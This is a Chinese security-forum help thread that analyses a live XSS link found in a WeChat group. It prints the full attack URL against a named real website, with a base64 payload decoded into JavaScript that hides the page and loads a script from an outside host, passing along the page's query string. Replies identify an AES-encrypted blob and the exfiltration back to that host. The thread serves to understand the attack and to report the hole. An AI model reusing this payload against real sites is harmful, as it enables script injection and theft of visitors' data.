首页
社区
课程
招聘
未解决 [求助]一个xss攻击样本中,代码的作用求解
发表于: 2020-11-16 09:51 1618

未解决 [求助]一个xss攻击样本中,代码的作用求解

2020-11-16 09:51
1618

在微信群里看到一个连接,链接:

1
https://www.qufair.com/public/login/pintb/daqin33?ref=https%3A%2F%2Fwww.qufair.com%2Fconvention%2F5880.shtml520%27%7D)%7D;new%20Function(atob(%60ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7di5zcmM9Ii8vejIuZHVveGouY29tL3giK3dpbmRvdy5sb2NhdGlvbi5zZWFyY2g7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw%60))();if(0)%7B$(%7B//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

第一部分 创建个函数然后跳转

1
2
3
4
5
6
7
(function anonymous() {
    document.documentElement.hidden=1;
    v=document.createElement("script");
    v.src="//z2.duoxj.com/x"+window.location.search;
    document.head.appendChild(v);
    throw 0
})

但是第二部分中

1
if(0){$({//&U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

按我理解是一个不调用的闭合函数, 但中间有段aes加密的密文

1
U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt=

求教这个干嘛用的,有点逼死强迫症的感觉
(地址没隐藏,希望能联系上这个站点管理员的让补下漏洞吧)


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 477
活跃值: (1412)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
b64吧
2020-11-16 12:39
0
雪    币: 212
活跃值: (400)
能力值: ( LV3,RANK:38 )
在线值:
发帖
回帖
粉丝
3
嗯,decode后有Salted的头,是AES加密的文本。 
 v.src="//z2.duoxj.com/x"+window.location.search; 有带链接回去
所以应该是个平台,带了类似场景值得东西回去。
自己结贴
2020-11-16 13:53
0
游客
登录 | 注册 方可回帖
返回
//